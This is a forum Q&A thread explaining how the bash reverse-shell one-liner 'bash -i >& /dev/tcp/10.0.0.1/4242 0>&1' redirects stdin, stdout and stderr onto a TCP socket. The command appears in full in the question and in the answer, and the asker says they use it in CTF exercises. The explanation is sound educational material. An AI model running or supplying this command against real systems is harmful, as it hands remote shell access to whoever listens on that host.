# why is there a "0>&1"?

Tags: linux, bash, file-descriptors

I am still trying to figure out how this command works?

```
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
```

I found out somewhere that `0>&1` means that STDIN is sent through the connection, but shouldn't STDIN be sent already through that connection, since `>&` means "send everything to `/dev/tcp/HOST/PORT`"?

Comment: `>&` or the bash-preferred form `&>` redirects fd 1 (stdout) and fd 2 (stderr) but not fd 0 (stdin) and not other fds (nonstandard and rarely used). See [the manual](https://www.gnu.org/software/bash/manual/html_node/Redirections.html#Redirecting-Standard-Output-and-Standard-Error)

Answer (score 2):

That command does not work. At least not for any non-charitable definition of "work".

The shell will be still attached to the terminal it was started from, and the job control, things like `Control-C`, `Control-Z` or running commands in the background will not work. You also won't be able to run that snippet itself in the background with `&`.

And why should you run a shell over a non-encrypted connection in 2021, when you could easily run a ssh server as a regular user, on any port >= 1024?

I have no idea why that snippet keeps popping up (it's like to 15th or 17th time I see it) -- maybe someone was *too successful* at promoting his blog ;-)

> `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`

> `>&` means "send everything to `/dev/tcp/HOST/PORT`"

No it does not mean that. In bash, it means "open a tcp connection to HOST and PORT and `dup2(2)` the connected socket into file descriptor 1 (stdout) and 2 (stderr). Then `0>&1` means "`dup2(2)` file descriptor 1 (stdout) into file descriptor 0 (stdin)".

Since the redirections happen from left to right, that will run `bash -i` with the socket connected to HOST and PORT as its stdin, stdout and stderr.

Comment: From here perhaps? https://gist.github.com/gustavohenrique/0721a23900f51287e517aed3662d4f3a#reverse-shell or https://github.com/fijimunkii/bash-dev-tcp/blob/master/reverse-shell or the like

Comment: Well , I need this snippet for a rev shell , i kept using it in ctfs , but i never understood how it actually works .Thanks a lot!